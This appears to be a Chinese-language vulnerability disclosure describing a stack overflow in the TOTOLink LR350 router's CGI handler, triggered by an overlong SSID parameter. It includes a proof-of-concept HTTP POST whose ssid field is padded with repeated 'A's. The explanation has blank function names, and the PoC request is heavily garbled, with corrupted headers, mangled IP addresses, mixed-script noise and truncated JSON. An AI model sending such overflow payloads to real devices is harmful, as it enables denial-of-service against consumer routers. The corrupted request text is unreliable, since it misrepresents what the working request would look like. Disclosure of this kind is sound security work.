关键信息 漏洞信息 漏洞名称: TOTOLink Vulnerability 厂商: TOTOLink 产品: LR350 版本: V9.3.5u.6369_B20220309 漏洞类型: Stack Overflow 漏洞原因 在子函数 中,通过 获取 SSID 参数,并通过 函数进行解码。 当 参数为 "0" 时,解码后的数据被存储到固定大小的栈上缓冲区中。 如果 SSID 参数过长,会导致缓冲区溢出,覆盖相邻的栈数据或返回地址,引发 DoS 攻击。 漏洞代码 PoC(攻击样本) ``` POST /cgi-bin/subGpi.cgi HTTP/1.1 /wiki/p experienced: XMLgetLastRequest Accept-Lamguago: en-US,en78=0.9 Accept: application/jsonatext/-backend7"77: q-co1 Conbtenr-zLy repeatsL tubes-on-form-urlencoded7change4u-8 Pest dint用户 Ko 15.0 谭基秀及科科t Li0xamp 46 AIMWONT 730%7html G6690) Chrome饰474150 Origin: http://192.168.6.15 Relerer: http://1192168.6.51 /phone/Log7.shtl Accept-Encoding: wait. deflre.ge, Conneetian2 close {"подбот":"0","ssid":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAوAAAAAAAAAAAAAAAgroAAAAAAAAAAAAAAAAAA "topicurl":"setWiF;